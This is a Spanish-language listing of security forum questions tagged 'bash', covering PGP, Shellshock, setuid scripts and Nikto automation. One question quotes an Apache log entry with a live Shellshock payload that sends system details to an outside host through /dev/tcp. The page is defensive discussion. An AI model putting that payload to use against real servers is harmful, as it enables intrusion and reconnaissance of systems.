Preguntas con etiqueta 'bash'

2
respuestas

descifrar de forma segura un mensaje PGP no solicitado / no confiable

Estoy aceptando informes de vulnerabilidad de seguridad pública para mi sitio web, y publico mi clave personal PGP (GPG) para alentar a las personas a cifrar sus comunicaciones. Al recibir un mensaje cifrado, ¿cuál es la mejor manera de desci...
hecha 17.02.2018 - 00:26
1
respuesta

Shellshock y PHP fastcgi

Entiendo que ejecutar apache / mod_php es seguro, pero no he escuchado sobre el caso de ejecutar php en modo fastcgi (a través de nginx / php5-fpm), entonces, ¿alguien puede confirmar que esto también es seguro?     
hecha 07.10.2014 - 05:37
1
respuesta

¿Qué busca en el código de código abierto para asegurarse de que no haya código malicioso?

Me doy cuenta de que las respuestas serán específicas para cada idioma, pero tengo curiosidad por saber qué términos buscarías al revisar algo en Github. Estaba buscando una herramienta de administración remota que podía usar con los clientes y...
hecha 29.08.2018 - 06:01
2
respuestas

Envoltorios de script Set-uid, 'system (3)' shellshock y función de Bash importados del entorno

Dado , es un requisito frecuente permitir a los usuarios sin privilegios acceso restringido a funciones privilegiadas: los administradores de sistemas de trabajo a veces proporcionan esto en forma de shellscripts, que luego se invocan a través...
hecha 03.10.2014 - 15:01
2
respuestas
1
respuesta

Bash Shellshock

Estoy intentando averiguar si mis dispositivos son vulnerables a bash shellshock. He ejecutado los comandos que se encuentran en enlace . Parece que mis dispositivos son susceptibles a una sola de las vulnerabilidades: Exploit 7 CVE-2014-6277,...
hecha 17.03.2015 - 13:35
1
respuesta

Línea de registro de Apache extraño [duplicado]

Acabo de encontrar esta entrada en uno de mis servidores: 213.165.70.245 - - [17/Jun/2015:01:58:22 +0200] "GET / HTTP/1.1" 404 442 "() { :;}; /bin/bash -c \"echo 109.234.106.8/ > /dev/tcp/74.208.79.34/21; /bin/uname -a > /dev/tcp/74.2...
hecha 17.06.2015 - 07:56
1
respuesta

¿Por qué es una idea terrible implementar medidas restrictivas en .bashrc?

Preguntando esto porque aparentemente hay multiple personas que realmente no se dan cuenta qué idea tan mala es esta, y quiero que haya un lugar único y fácil de encontrar para que puedan ir y ser enviados.     
hecha 18.07.2015 - 05:41
1
respuesta

Implicaciones de seguridad del uso del script Bash como shell de inicio de sesión SSH

Tengo una implementación de monitoreo bastante simple, digamos que el servidor de monitoreo se conecta a un objetivo a través de SSH a través de la autenticación de clave, y obtiene información de acuerdo a un script configurado como shell de in...
hecha 26.11.2017 - 22:04
1
respuesta

Automatizando el escáner NIKTO

Estoy trabajando en la automatización de NIKTO. Tengo un archivo de texto que contiene una lista de direcciones IP junto con sus puertos abiertos. Ya he hecho un script nikto. Funcionalidad de script: toma las direcciones IP y luego ejecuta n...
hecha 10.06.2015 - 05:24